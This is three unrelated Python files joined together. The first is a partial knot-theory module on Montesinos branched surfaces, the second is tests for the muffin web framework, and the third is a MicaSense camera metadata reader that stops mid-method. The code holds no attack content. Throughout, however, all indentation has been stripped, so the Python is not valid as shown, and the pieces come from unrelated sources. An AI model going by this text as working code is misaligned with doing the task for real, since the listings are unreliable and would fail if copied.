if v.frac < w.frac:
tau = tau + 2
else:
tau = tau - 2
return tau
def __eq__(self, o):
if not isinstance(o, edgepath):
raise TypeError
return self.tangle == o.tangle and self.path == o.path
def clone(self):
return edgepath(self.tangle, self.path)
# a branched surface is a collection of edgepaths one for each tangle.
# The tangles are regarded as cyclically ordered, and if b is
# branched_surface, b[i] is the (i % n)th edgepath, where n = num of
# tangles.
class branched_surface:
def __init__(self, paths, type, u):
self.edgepaths = paths # a cyclically ordered list of edgepaths (edgepaths[0] not ness. for tangle 0)
self.type = type # I, II, or III
self.u = u # u coordinate of ending point
self.twist = self.compute_twist()
self.slope = "?"
self.carries_incompressible = 0
self.num_sheets = self.comp_sheets()
self.euler_char = self.comp_euler_char()
self.from_non_iso_solution = 0 # used only in regression testing against Oretel's ver.
def __repr__(self):
if self.carries_incompressible:
s = "type %s incompressible, " % self.type
else:
s = "type %s compressible, " % self.type
s = s + "u = %s, slope: %s, twist %s, sheets: %i, euler: %i\n" % (self.u,
self.slope, self.twist, self.num_sheets,
self.euler_char)
# we sometimes re-arrange the paths, so print them in the
# standard order
for i in range(0, len(self.edgepaths)):
for path in self.edgepaths:
if path.tangle == i:
s = s + "%s" % path + "\n"
return s
# with no args, returns the number of edgepaths that are
# completely reversible. with arg, which should be a range of
# numbers, returns the number of edgepaths in that range that are
# comp. reversible.
def num_reversible(self, r="noarg"):
num = 0
if r == "noarg":
r = range(0, len(self.edgepaths) )
for i in r:
num = num + self[i].completely_reversible
return num
def compute_twist(self):
twist = 0
for path in self.edgepaths:
twist = twist + path.twist()
return twist
def comp_slope(self, seifert_twist):
self.slope = self.twist - seifert_twist
def comp_sheets(self):
# If the endpoint of each path is written (a_i, b_i, c_i) then
# the number of sheets is the lcm of the a_i. a_i = minimal # of arcs
# needed to represent that point in the diagram
a = []
for path in self.edgepaths:
a.append( path[0].num_arcs() )
return lcm(a)
def comp_euler_char(self):
n = len(self.edgepaths)
sheets = self.num_sheets
euler_char = 0
#compute euler char of each piece seperately, add together
for path in self.edgepaths:
# base disks
if len(path) == 1 and isinstance(path[0], interior_of_edge_of_D):
k , m = path[0].km.t, path[0].km.b
euler_char = euler_char + 2*sheets + (m-k)*(sheets//k) # = 2m arcs + m - k circles
else:
euler_char = euler_char + 2*sheets
#count saddles
num_saddles = 0
if len(path) != 1:
# First edge is special case:
if isinstance(path[0], interior_of_edge_of_D):
num_saddles = num_saddles + path[0].km.t * sheets // path[0].km.b
else:
num_saddles = num_saddles + sheets
# rest of edges
num_saddles = num_saddles + sheets * (len(path) - 2)
euler_char = euler_char - num_saddles
# adjustments for additional saddles
if self.type == "II":
sum_of_endpoints = 0
for path in self.edgepaths:
sum_of_endpoints = sum_of_endpoints + path[0].p()
euler_char = euler_char - abs(sum_of_endpoints)*sheets # adjustment for vert. edges
if self.type == "III":
euler_char = euler_char - sheets*n # adjustment for additional saddles going to infinity
# now glue together
if self.type == "III":
euler_char = euler_char - sheets*n # adjustment for glueing
if self.type == "I":
# we need to know how we glue components which end in arcs
# together as we go from tangle to tangle (we can ignore
# those ending in circles because there is no change in
# euler characteristic when you attach via a circle). Cut
# the arcs via a vertical line running through the middle
# of the punctures. The number we want is the number of
# pieces on one side of the line. If a pair of arcs have
# slope p/q it interects this line in 2*q places. The
# number of components C on one side of the line is then
# (num end pts)/2 = q + 1. This number is independant of
# the tangle because it depends only on the intersection
# of the surface with the axis (the line around which the
# tangles are arranged.
v = self.edgepaths[0][0]
if isinstance(v, interior_of_edge_of_D):
k, m = v.km.t, v.km.b
# is on horizontal edge <p/q, p/q>
if v.pq == v.rs:
C = (sheets//k)*(k*(v.q() + 1) + (m - k)*v.q())
else:
C = k*sheets//m*(v.q() + 1) + (m - k)*sheets//m*(v.s() + 1)
else:
C = (v.q() + 1)*sheets
# each time we attach a tangle to the next one, we
# decrease euler_char by -C. The exception is the last
# glueing where we're gluing together different parts of
# the same thing. In this case, the euler char increases by
# C - 2*sheets
euler_char = euler_char - C*(n - 1) + (C - 2*sheets)
if self.type == "II":
euler_char = euler_char - 2*sheets*(n-1) # see above
return euler_char
# cyclically permutes the paths so that the current ith one is
# made the _last_ one
def cycle_paths_so_last(self, i):
i = i % len(self.edgepaths)
self.edgepaths = self.edgepaths[i+1:] + self.edgepaths[:i] + [ self.edgepaths[i]]
def reflect(self):
self.edgepaths.reverse()
def r_values(self):
ans = [E.r_value for E in self.edgepaths]
ans.sort()
return ans
# gets ith path with cycle ordering
def __getitem__(self, i):
return self.edgepaths[i % len(self.edgepaths)]
def __eq__(self, o):
return self.type == o.type and self.u == o.u and self.edgepaths == o.edgepaths
# For each tangle we will need a tree in order to determine the Type I
# solutions. Each node consists of a vertex with links to its two
# leftward neighbors and a link rightward vertex it came from.
class node:
def __init__(self, vertex, back):
self.vertex = vertex
self.leftward = [None, None]
self.back = back # back to the right
def p(self):
return self.vertex.p()
def q(self):
return self.vertex.q()
def u(self):
return self.vertex.u()
def v(self):
return self.vertex.v()
def __repr__(self):
s = "%s" % self.vertex
if self.leftward[0]:
s = s + " up: " + repr(self.leftward[0].vertex)
if self.leftward[1]:
s = s + " down " + repr(self.leftward[1].vertex)
if self.back:
s = s + " back: " + repr(self.back.vertex)
return s
class conway_sphere:
slope = frac(1,0)
carries_incompressible = 1
num_sheets = "Conway Sphere"
euler_char = -2
from_non_iso_solution = 0
def __repr__(self):
return "<montesinos_base.conway_sphere>"
# Takes a list of lists [L_1, ... , L_n] and outputs a list consisting
# of all points in the cartesian product of the L1, i.e. every list
# whose ith element is in L_i
def product_of_lists( lists, done=[[]]):
if len(lists) == 0: return done
new_list = []
for list in done:
for item in lists[0]:
new_list.append( list + [item] )
return product_of_lists( lists[1:], new_list )
|
"""Base Tests."""
from pathlib import Path
from unittest import mock
def test_imports():
import muffin
assert muffin.Request
assert muffin.Response
assert muffin.ResponseError
assert muffin.ResponseFile
assert muffin.ResponseHTML
assert muffin.ResponseJSON
assert muffin.ResponseRedirect
assert muffin.ResponseStream
assert muffin.ResponseText
assert muffin.ASGINotFound
assert muffin.ASGIMethodNotAllowed
assert muffin.TestClient
def test_app(app):
assert app
assert app.cfg.name == 'muffin'
assert repr(app) == '<muffin.Application: muffin>'
def test_app_config():
import muffin
import os
os.environ['TEST_DEBUG'] = 'true'
app = muffin.Application('tests.appcfg', config='unknown', name='test')
assert app.cfg
assert app.cfg.CONFIG == 'tests.appcfg'
assert app.cfg.CONFIG_VARIABLE == 42
assert app.cfg.DEBUG is True
assert app.cfg.MANAGE_SHELL
assert app.cfg.STATIC_URL_PREFIX == '/static'
async def test_routing(app, client):
import re
@app.route('/simple', re.compile('/simple/(a|b|c)/?$'), methods=['GET'])
async def test(request):
return 200, 'simple'
@app.route(r'/parameters/{param1}/{param2}')
async def test(request):
return 200, request.path_params
res = await client.get('/simple')
assert res.status_code == 200
assert await res.text() == 'simple'
res = await client.post('/404')
assert res.status_code == 404
res = await client.post('/simple')
assert res.status_code == 405
res = await client.get('/simple/a')
assert res.status_code == 200
assert await res.text() == 'simple'
res = await client.get('/simple/b/')
assert res.status_code == 200
assert await res.text() == 'simple'
res = await client.get('/parameters/42/33')
assert res.status_code == 200
assert await res.json() == {'param1': '42', 'param2': '33'}
@app.route('/trim/last/slash/')
async def test(request):
return 'OK'
res = await client.get('/trim/last/slash/')
assert res.status_code == 200
assert await res.text() == 'OK'
@app.route('/sync')
def sync(request):
return 'Sync OK'
res = await client.get('/sync')
assert res.status_code == 200
assert await res.text() == 'Sync OK'
async def test_responses(app, client):
@app.route('/none')
async def none(request):
return None
@app.route('/bool')
async def none(request):
return False
@app.route('/str')
async def str(request):
return 'str'
@app.route('/bytes')
async def bytes(request):
return b'bytes'
@app.route('/json')
async def json(request):
return {'test': 'passed'}
res = await client.get('/none')
assert res.status_code == 200
assert res.headers['content-type'] == 'application/json'
assert await res.json() is None
res = await client.get('/bool')
assert res.status_code == 200
assert res.headers['content-type'] == 'application/json'
assert await res.json() is False
res = await client.get('/str')
assert res.status_code == 200
assert res.headers['content-type'] == 'text/html; charset=utf-8'
assert await res.text() == 'str'
res = await client.get('/bytes')
assert res.status_code == 200
assert res.headers['content-type'] == 'text/html; charset=utf-8'
assert await res.text() == 'bytes'
res = await client.get('/json')
assert res.status_code == 200
assert res.headers['content-type'] == 'application/json'
assert await res.json() == {'test': 'passed'}
async def test_websockets(app, client):
from muffin import ResponseWebSocket
@app.route('/stream')
async def stream(request):
ws = ResponseWebSocket(request)
await ws.accept()
msg = await ws.receive()
assert msg == 'ping'
await ws.send('pong')
await ws.close()
async with client.websocket('/stream') as ws:
await ws.send('ping')
msg = await ws.receive()
assert msg == 'pong'
async def test_middlewares(app, client):
@app.middleware
async def simple_middleware(app, request, receive, send):
response = await app(request, receive, send)
if request.path == '/md/simple':
response.headers['x-simple'] = 'passed'
return response
@app.middleware
def classic_middleware(app):
async def middleware(scope, receive, send):
async def custom_send(msg):
if scope['path'] == '/md/classic' and msg['type'] == 'http.response.start':
msg['headers'].append((b'x-classic', b'passed'))
await send(msg)
await app(scope, receive, custom_send)
return middleware
@app.route('/md/simple')
async def simple(request):
return 200,
@app.route('/md/classic')
async def classic(request):
return 200,
res = await client.get('/')
assert res.status_code == 200
assert not res.headers.get('x-simple')
assert not res.headers.get('x-classic')
res = await client.get('/md/simple')
assert res.status_code == 200
assert res.headers['x-simple'] == 'passed'
assert not res.headers.get('x-classic')
res = await client.get('/md/classic')
assert res.status_code == 200
assert not res.headers.get('x-simple')
assert res.headers['x-classic'] == 'passed'
async def test_lifespan(app):
import muffin
start, finish = mock.MagicMock(), mock.MagicMock()
app.on_startup(start)
app.on_shutdown(finish)
client = muffin.TestClient(app)
async with client.lifespan():
assert start.called
assert not finish.called
res = await client.get('/')
assert res.status_code == 200
assert start.called
assert finish.called
def test_configure_logging():
import muffin
dummy = {'dummy': 'dict', 'version': 1}
with mock.patch('logging.config.dictConfig') as mocked:
app = muffin.Application('muffin', LOG_CONFIG=dummy)
assert app.logger
assert app.logger.handlers
mocked.assert_called_once_with(dummy)
async def test_static_folders():
import muffin
app = muffin.Application(
static_folders=['tests', Path(__file__).parent.parent],
static_url_prefix='/assets')
assert app.cfg.STATIC_FOLDERS
assert app.cfg.STATIC_URL_PREFIX == '/assets'
@app.route('/')
async def index(request):
return 'OK'
client = muffin.TestClient(app)
res = await client.get('/')
assert res.status_code == 200
res = await client.get('/assets/test_application.py')
assert res.status_code == 200
text = await res.text()
assert text.startswith('"""Base Tests."""')
res = await client.get('/assets/setup.cfg')
assert res.status_code == 200
async def test_error_handlers(client, app):
import muffin
@app.route('/500')
async def raise_500(request):
raise muffin.ResponseError(500)
@app.route('/unhandled')
async def raise_unhandled(request):
raise Exception()
@app.on_error(muffin.ResponseError)
async def handler(request, exc):
return 'Custom Server Error'
@app.on_error(404)
async def handler_404(request, exc):
return 'Custom 404'
@app.on_error(Exception)
async def handle_exception(request, exc):
return 'Custom Unhandled'
assert app.exception_handlers
res = await client.get('/unhandled')
assert res.status_code == 200
assert await res.text() == 'Custom Unhandled'
res = await client.get('/500')
assert res.status_code == 200
assert await res.text() == 'Custom Server Error'
res = await client.get('/404')
assert res.status_code == 200
assert await res.text() == 'Custom 404'
del app.exception_handlers[404]
del app.exception_handlers[muffin.ResponseError]
async def test_nested(client, app):
@app.middleware
async def mid(app, req, receive, send):
response = await app(req, receive, send)
response.headers['x-app'] = 'OK'
return response
from muffin import Application
subapp = Application()
@subapp.route('/route')
def subroute(request):
return 'OK from subroute'
@subapp.middleware
async def mid(app, req, receive, send):
response = await app(req, receive, send)
response.headers['x-subapp'] = 'OK'
return response
app.route('/sub')(subapp)
res = await client.get('/sub/route')
assert res.status_code == 200
assert await res.text() == 'OK from subroute'
assert res.headers['x-app'] == 'OK'
assert res.headers['x-subapp'] == 'OK'
|
#!/usr/bin/env python3
# coding: utf-8
"""
RedEdge Metadata Management Utilities
Copyright 2017 MicaSense, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in the
Software without restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Support strings in Python 2 and 3
from __future__ import unicode_literals
import pytz
import math
import pyexiv2
from os.path import isfile
from pathlib import Path
from packaging import version
from datetime import datetime, timedelta
from typing import Optional, Union, Tuple, List
class MetadataFromExif(object):
"""Container for Micasense image metadata extracted from EXIF metadata"""
def __init__(
self,
filename: Union[str, Path],
):
if not isfile(filename):
raise IOError("Input path is not a file")
md = pyexiv2.ImageMetadata(str(filename))
md.read()
self.exif = md
meta_dict = dict()
if md.exif_keys:
for keys in md.exif_keys:
meta_dict[keys] = md[keys].raw_value
if md.iptc_keys:
for keys in md.iptc_keys:
meta_dict[keys] = md[keys].raw_value
if md.xmp_keys:
for keys in md.xmp_keys:
meta_dict[keys] = md[keys].raw_value
self.meta = meta_dict
def get_all(self) -> dict:
"""Get all extracted metadata items"""
return self.meta
def get_item(
self, item: str, index: Optional[int] = None
) -> Union[float, int, str, None]:
"""Get metadata item by Namespace:Parameter"""
val = None
try:
val = self.exif[item]
if index is not None:
try:
if isinstance(val, unicode):
val = val.encode("ascii", "ignore")
except NameError:
# throws on python 3 where unicode is undefined
pass
if isinstance(val, str) and len(val.split(",")) > 1:
val = val.split(",")
val = val[index]
except KeyError:
# print ("Item "+item+" not found")
pass
except IndexError:
print(
"Item {0} is length {1}, index {2} is outside this range.".format(
item, len(self.exif[item]), index
)
)
return val
def print_all(self) -> None:
for item in self.get_all():
print("{}: {}".format(item, self.get_item(item)))
def dls_present(self) -> bool:
dls_keys = [
"Xmp.DLS.HorizontalIrradiance",
"Xmp.DLS.DirectIrradiance",
"Xmp.DLS.SpectralIrradiance",
]
return any([v in self.meta.keys() for v in dls_keys])
def supports_radiometric_calibration(self) -> bool:
return "Xmp.MicaSense.RadiometricCalibration" in self.meta.keys()
def position(self) -> Tuple[float, float, float]:
"""get the WGS-84 latitude, longitude tuple as signed decimal degrees"""
def convert_deg2decimal(coord: List) -> float:
return (
coord[0].__float__()
+ (coord[1].__float__() / 60.0)
+ (coord[2].__float__() / 3600.0)
)
lat = convert_deg2decimal(self.exif["Exif.GPSInfo.GPSLatitude"].value)
latref = self.exif["Exif.GPSInfo.GPSLatitudeRef"].value
lat = lat if latref == "N" else -lat
lon = convert_deg2decimal(self.exif["Exif.GPSInfo.GPSLongitude"].value)
lonref = self.exif["Exif.GPSInfo.GPSLongitudeRef"].value
lon = lon if lonref == "E" else -lon
alt = float(self.exif["Exif.GPSInfo.GPSAltitude"].value)
return lat, lon, alt
def utc_time(self) -> Union[datetime, None]:
"""Get the timezone-aware datetime of the image capture"""
try:
utctime_rval = self.exif["Exif.Image.DateTime"].raw_value
except KeyError:
utctime_rval = None
if utctime_rval is None:
utctime = None
else:
utctime = datetime.strptime(utctime_rval, "%Y:%m:%d %H:%M:%S")
# utctime can also be obtained with DateTimeOriginal:
# utctime = datetime.strptime(
# self.exif["Exif.Photo.DateTimeOriginal"].raw_value, "%Y:%m:%d %H:%M:%S"
# )
# extract the millisecond from the EXIF metadata:
subsec = int(self.exif["Exif.Photo.SubSecTime"].raw_value)
sign = -1.0 if subsec < 0 else 1.0
millisec = sign * 1e3 * float("0.{}".format(abs(subsec)))
utctime += timedelta(milliseconds=millisec)
timezone = pytz.timezone("UTC")
utctime = timezone.localize(utctime)
return utctime
def dls_pose(self) -> Tuple[float, float, float]:
"""get DLS pose as local earth-fixed yaw, pitch, roll in radians"""
pose_keys = ["Xmp.DLS.Yaw", "Xmp.DLS.Pitch", "Xmp.DLS.Roll"]
if all([v in self.meta.keys() for v in pose_keys]):
yaw = float(self.exif["Xmp.DLS.Yaw"].value)
pitch = float(self.exif["Xmp.DLS.Pitch"].value)
roll = float(self.exif["Xmp.DLS.Roll"].value)
else:
yaw = pitch = roll = 0.0
return yaw, pitch, roll
def rig_relatives(self) -> Union[List[float], None]:
if "Xmp.Camera.RigRelatives" in self.meta.keys():
return [
float(i) for i in self.exif["Xmp.Camera.RigRelatives"].value.split(",")
]
else:
return None
def capture_id(self) -> Union[None, str]:
return self.exif["Xmp.MicaSense.CaptureId"].value
def flight_id(self) -> Union[None, str]:
return self.exif["Xmp.MicaSense.FlightId"].value
def camera_make(self) -> Union[None, str]:
# this should return "micasense"
return self.exif["Exif.Image.Make"].value
def camera_model(self) -> Union[None, str]:
# this should return "RedEdge-M"
return self.exif["Exif.Image.Model"].value
def firmware_version(self) -> Union[None, str]:
return self.exif["Exif.Image.Software"].value
def band_name(self) -> Union[None, str]:
# for Red-Camera:
# Blue, Green, Red, NIR, Red edge
# for Blue-Camera:
# Blue-444, Green-531, Red-650, Red edge-705, Red edge-740
return self.exif["Xmp.Camera.BandName"].value
def band_index(self) -> Union[None, int]:
# for Red-Camera
# 0, 1, 2, 3, 4
# for Blue-Camera
# 5, 6, 7, 8, 9
k = "Xmp.Camera.RigCameraIndex"
return int(self.exif[k].value) if k in self.meta.keys() else None
def exposure(self) -> float:
"""extract the exposure (integration time) in seconds"""
exp = float(self.exif["Exif.Photo.ExposureTime"].value)
# correct for incorrect exposure in some legacy RedEdge firmware versions
if self.camera_model() != "Altum":
if math.fabs(exp - (1.0 / 6329.0)) < 1e-6:
exp = 0.000274
return exp
def gain(self) -> float:
"""extract the image gain"""
return float(self.exif["Exif.Photo.ISOSpeed"].value) / 100.0
def image_size(self) -> Tuple[int, int]:
"""extract the image size (ncols, nrows)"""
return int(self.exif["Exif.Image.ImageWidth"].value), int(
self.exif["Exif.Image.ImageLength"].value
)
def center_wavelength(self) -> float:
"""extract the central wavelength (nm)"""
return float(self.exif["Xmp.Camera.CentralWavelength"].value)
def bandwidth(self) -> float:
"""extract the bandwidth (nm)"""
return float(self.exif["Xmp.Camera.WavelengthFWHM"].value)
def radiometric_cal(self) -> List[float]:
"""extract the radiometric calibration coefficients"""
return [float(v) for v in self.exif["Xmp.MicaSense.RadiometricCalibration"].value]
def black_level(self) -> float:
"""Extract the mean dark current"""
if "Exif.Image.BlackLevel" in self.meta.keys():
bl_sum, bl_num = 0.0, 0.0
for x in self.exif["Exif.Image.BlackLevel"].value:
bl_sum += float(x)
bl_num += 1.0
mean_bl = bl_sum / bl_num
else:
mean_bl = 0.0
return mean_bl
def dark_pixels(self) -> float:
"""
Get the average of the optically covered pixel values
Note: these pixels are raw, and have not been radiometrically
corrected. Use the black_level() method for all
radiomentric calibrations
"""
total, num = 0.0, 0.0
for pixel in self.exif["Xmp.MicaSense.DarkRowValue"].value:
total += float(pixel)
num += 1.0
return total / float(num)
def bits_per_pixel(self) -> int:
"""
get the number of bits per pixel, which defines the
maximum digital number value in the image
"""
return int(self.exif["Exif.Image.BitsPerSample"].value)
def vignette_center(self) -> List[float]:
"""get the vignette center in X and Y image coordinates"""
k = "Xmp.Camera.VignettingCenter"
return [float(v) for v in self.exif[k].value] if k in self.meta.keys() else None
def vignette_polynomial(self) -> List[float]:
"""
get the radial vignette polynomial in the order
it's defined within the metadata
"""
k = "Xmp.Camera.VignettingPolynomial"
return [float(v) for v in self.exif[k].value] if k in self.meta.keys() else None
def distortion_parameters(self) -> List[float]:
return [float(v) for v in self.exif["Xmp.Camera.PerspectiveDistortion"].value]
def principal_point(self) -> List[float]:
return [float(v) for v in self.exif["Xmp.Camera.PrincipalPoint"].value.split(",")]
def focal_plane_resolution_px_per_mm(self) -> Tuple[float, float]:
fp_x_resolution = float(self.exif["Exif.Photo.FocalPlaneXResolution"].value)
fp_y_resolution = float(self.exif["Exif.Photo.FocalPlaneYResolution"].value)
return fp_x_resolution, fp_y_resolution
def focal_length_mm(self) -> float:
key = "Xmp.Camera.PerspectiveFocalLengthUnits"
units = None if key not in self.meta.keys() else self.exif[key].value
focal_len_mm = 0.0
if units == "mm":
focal_len_mm = float(self.exif["Xmp.Camera.PerspectiveFocalLength"].value)
else:
focal_len_px = float(self.exif["Xmp.Camera.PerspectiveFocalLength"].value)
focal_len_mm = focal_len_px / self.focal_plane_resolution_px_per_mm()[0]
return focal_len_mm
def sfactor_35mm(self) -> float:
"""
extract the 35mm scale factor, sf[35], such that,
35 mm equivalent focal length = sf[35] * focal_length
"""
def __calc_backend(pxl_um: float, ncols: int, nrows: int) -> float:
"""
Backend calculation of the 35 mm scale factor
Parameters
----------
pxl_um : pixel size (micrometers, um) [float]
ncols : image width (or number of image columns) [int]
nrows : image height (or number of image rows) [int]
"""
pxl_mm = pxl_um / 1000.0 # pixel size in mm
diag_img = ((ncols * pxl_mm) ** 2 + (nrows * pxl_mm) ** 2) ** 0.5
diag_35mm = ((36.0) ** 2 + (24.0) ** 2) ** 0.5
return diag_35mm / diag_img
w, h = self.image_size()
pxl_size = 3.75 # micrometers
if self.camera_model() == "Altum":
if self.band_name().lower() == "lwir":
pxl_size = 12.0 # micrometers
else:
pxl_size = 3.45
return __calc_backend(pxl_size, w, h)
def focal_length_35_mm_eq(self) -> float:
# pyexiv2 cannot access the Composite keys including:
# Composite:FocalLength35efl
return float(self.exif["Exif.Photo.FocalLength"].value) * self.sfactor_35mm()
def irradiance_scale_factor(self) -> float:
"""
Get the calibration scale factor for the irradiance measurements
in this image metadata. Due to calibration differences between
DLS1 and DLS2, we need to account for a scale factor change in
their respective units. This scale factor is pulled from the image
metadata, or, if the metadata doesn't give us the scale, we assume
one based on a known combination of tags
"""
scale_factor = 0.0
key = "Xmp.DLS.IrradianceScaleToSIUnits"
# key = "Xmp.Camera.IrradianceScaleToSIUnits"
if key in self.meta.keys():
# the metadata contains the scale
scale_factor = float(self.exif[key].value)
elif "Xmp.DLS.HorizontalIrradiance" in self.meta.keys():
# DLS2 but the metadata is missing the scale, assume 0.01
# For some reason, the DLS2 outputs processed irradiance
# with units of micro-W/cm^2/nm;
# Hence scale factor = 0.01
# W/m^2/nm = 0.01 micro-W/cm^2/nm
scale_factor = 0.01
else:
# DLS1, so we use a scale of 1
scale_factor = 1.0
return scale_factor
def horizontal_irradiance_valid(self) -> bool:
"""
Defines if horizontal irradiance tag contains a value that can be trusted
some firmware versions had a bug whereby the direct and scattered irradiance
were correct, but the horizontal irradiance was calculated incorrectly
"""
if "Xmp.DLS.HorizontalIrradiance" not in self.meta.keys():
return False
version_string = self.firmware_version().strip("v")
if self.camera_model() == "Altum":
good_version = "1.2.3"
elif self.camera_model() == "RedEdge" or self.camera_model() == "RedEdge-M":
good_version = "5.1.7"
else:
raise ValueError(
"Camera model is required to be RedEdge or Altum, not {} ".format(
self.camera_model()
)
)
return version.parse(version_string) >= version.parse(good_version)
def __float_or_zero(self, key: str) -> float:
return 0.0 if key not in self.meta.keys() else float(self.exif[key].value)
def __get_irrad(self, key: str) -> float:
return self.__float_or_zero(key) * self.irradiance_scale_factor()
def spectral_irradiance(self) -> float:
"""
Raw spectral irradiance measured by an irradiance sensor.
Calibrated to W/m^2/nm using irradiance_scale_factor, but
not corrected for angles
"""
return self.__get_irrad("Xmp.DLS.SpectralIrradiance")
def horizontal_irradiance(self) -> float:
"""
Horizontal irradiance at the earth's surface below the DLS on the
plane normal to the gravity vector at the location (local flat
plane spectral irradiance)
"""
return self.__get_irrad("Xmp.DLS.HorizontalIrradiance")
def scattered_irradiance(self) -> float:
"""scattered component of the spectral irradiance"""
return self.__get_irrad("Xmp.DLS.ScatteredIrradiance")
def direct_irradiance(self) -> float:
"""
direct component of the spectral irradiance on a ploane normal
to the vector towards the sun
"""
return self.__get_irrad("Xmp.DLS.DirectIrradiance")
def solar_azimuth(self) -> float:
"""solar azimuth at the time of capture, as calculated by the camera system"""
return self.__float_or_zero("Xmp.DLS.SolarAzimuth")
def solar_elevation(self) -> float:
"""solar elevation at the time of capture, as calculated by the camera system"""
return self.__float_or_zero("Xmp.DLS.SolarElevation")
def estimated_direct_vector(self) -> Union[List[float], None]:
"""estimated direct light vector relative to the DLS2 reference frame"""
ed_vect = None
key = "Xmp.DLS.EstimatedDirectLightVector"
if key in self.meta.keys():
ed_vect = [float(v) for v in self.exif[key].value]
return ed_vect
def auto_calibration_image(self) -> bool:
"""
True if this image is an auto-calibration image, where the camera has
found and identified a calibration panel
"""
# print("PLEASE TEST auto_calibration_image()")
key = None
for k in self.meta.keys():
k_ = k.lower()
if ("xmp." in k_) and (".calibrationpicture" in k_):
key = k
if key is None:
cal_tag = None
else:
cal_tag = int(self.exif[key].value)
return (
cal_tag is not None
and cal_tag == 2
and self.panel_albedo() is not None
and self.panel_region() is not None
and self.panel_serial() is not None
)
def panel_albedo(self) -> Union[float, None]:
"""
Surface albedo of the active portion of the reflectance panel as
calculated by the camera (usually from the informatoin in the panel QR code)
"""
# print("PLEASE TEST panel_albedo()")
key = None
for k in self.meta.keys():
if ("xmp." in k.lower()) and (".albedo" in k.lower()):
key = k
return None if key is None else float(self.exif[key].value)
def panel_region(self) -> Union[None, List[int]]:
"""A 4-tuple containing image x,y coordinates of the panel active area"""
# print("PLEASE TEST panel_region()")
key, coords = None, None
for k in self.meta.keys():
if ("xmp." in k.lower()) and (".reflectarea" in k.lower()):
key = k
if key is not None:
c_ = [float(i) for i in self.exif[key].value[0].split(",")]
coords = list(zip(c_[0::2], c_[1::2]))
return coords
def panel_serial(self) -> Union[str, None]:
"""The panel serial number as extracted from the image by the camera"""
# print("PLEASE TEST panel_serial()")
key = None
for k in self.meta.keys():
if ("xmp." in k.lower()) and (".panelserial" in k.lower()):
key = k
return None if key is None else self.exif[key].value
class MetadataFromDict(object):
"""
Container for Micasense image metadata extracted from yaml dictionary
"""
def __init__(
self,
filename: Union[str, Path],
metadata_dict: dict,
):
"""
Parameters
----------
filename : Path or str
The image (.tif) filename, used to extract the relevant
metadata from the metadata_dict
metadata_dict : dict
The image-set acquisition metadata dictionary extracted from a
yaml file.
"""
if isinstance(filename, str):
filename = Path(filename)
self.im_name = filename.name
self.meta = metadata_dict
def print_all(self) -> None:
for item in self.meta():
print("{}: {}".format(item, self.meta[item]))
def dls_present(self) -> bool:
return self.meta["image_data"][self.im_name]["dls_present"]
def supports_radiometric_calibration(self) -> bool:
return self.meta["image_data"][self.im_name]["supports_radiometric_cal"]
def position(self) -> Tuple[float, float, float]:
"""get the WGS-84 latitude, longitude tuple as signed decimal degrees"""
return (
self.meta["dls_latitude"],
self.meta["dls_longitude"],
self.meta["dls_altitde"],
)
def utc_time(self) -> datetime:
return self.meta["dls_utctime"]
def dls_pose(self) -> Tuple[float, float, float]:
"""get DLS pose as local earth-fixed yaw, pitch, roll in radians"""
return (
self.meta["dls_yaw"],
self.meta["dls_pitch"],
self.meta["dls_roll"],
)
def rig_relatives(self) -> Union[List[float], None]:
return self.meta["image_data"][self.im_name]["rig_relatives"]
def capture_id(self) -> Union[None, str]:
return self.meta["capture_id"]
def flight_id(self) -> Union[None, str]:
return self.meta["flight_id"]
def camera_make(self) -> Union[None, str]:
# this should return "micasense"
return self.meta["camera_make"]
def camera_model(self) -> Union[None, str]:
# this should return "RedEdge-M"
return self.meta["camera_model"]
def firmware_version(self) -> Union[None, str]:
return self.meta["firmware_version"]
def band_name(self) -> Union[None, str]:
# for Red-Camera:
# Blue, Green, Red, NIR, Red edge
# for Blue-Camera:
# Blue-444, Green-531, Red-650, Red edge-705, Red edge-740
return self.meta["image_data"][self.im_name]["band_name"]
def band_index(self) -> Union[None, int]:
# for Red-Camera
# 0, 1, 2, 3, 4
# for Blue-Camera
# 5, 6, 7, 8, 9
return self.meta["image_data"][self.im_name]["rig_camera_index"]
def exposure(self) -> float:
"""extract the exposure (integration time) in seconds"""
return self.meta["image_data"][self.im_name]["exposure"]
def gain(self) -> float:
"""extract the image gain"""
return self.meta["image_data"][self.im_name]["gain"]
def image_size(self) -> Tuple[int, int]:
"""extract the image size (ncols, nrows)"""
return self.meta["image_size"]
def center_wavelength(self) -> float:
"""extract the central wavelength (nm)"""
return self.meta["image_data"][self.im_name]["wavelength_center"]
def bandwidth(self) -> float:
"""extract the bandwidth (nm)"""
return self.meta["image_data"][self.im_name]["wavelength_fwhm"]
def radiometric_cal(self) -> List[float]:
"""extract the radiometric calibration coefficients"""
return self.meta["image_data"][self.im_name]["rad_calibration"]
def black_level(self) -> float:
"""Extract the mean dark current"""
return self.meta["image_data"][self.im_name]["blacklevel"]
def dark_pixels(self) -> float:
"""
Get the average of the optically covered pixel values
Note: these pixels are raw, and have not been radiometrically
corrected. Use the black_level() method for all
radiomentric calibrations
"""
return self.meta["image_data"][self.im_name]["darkpixels"]
def bits_per_pixel(self) -> int:
"""
get the number of bits per pixel, which defines the
maximum digital number value in the image
"""
return self.meta["bits_persample"]
def vignette_center(self) -> List[float]:
"""get the vignette center in X and Y image coordinates"""
return self.meta["image_data"][self.im_name]["vignette_xy"]
def vignette_polynomial(self) -> List[float]:
"""
get the radial vignette polynomial in the order
it's defined within the metadata
"""
return self.meta["image_data"][self.im_name]["vignette_poly"]
def distortion_parameters(self) -> List[float]:
return self.meta["image_data"][self.im_name]["distortion_params"]
def principal_point(self) -> List[float]:
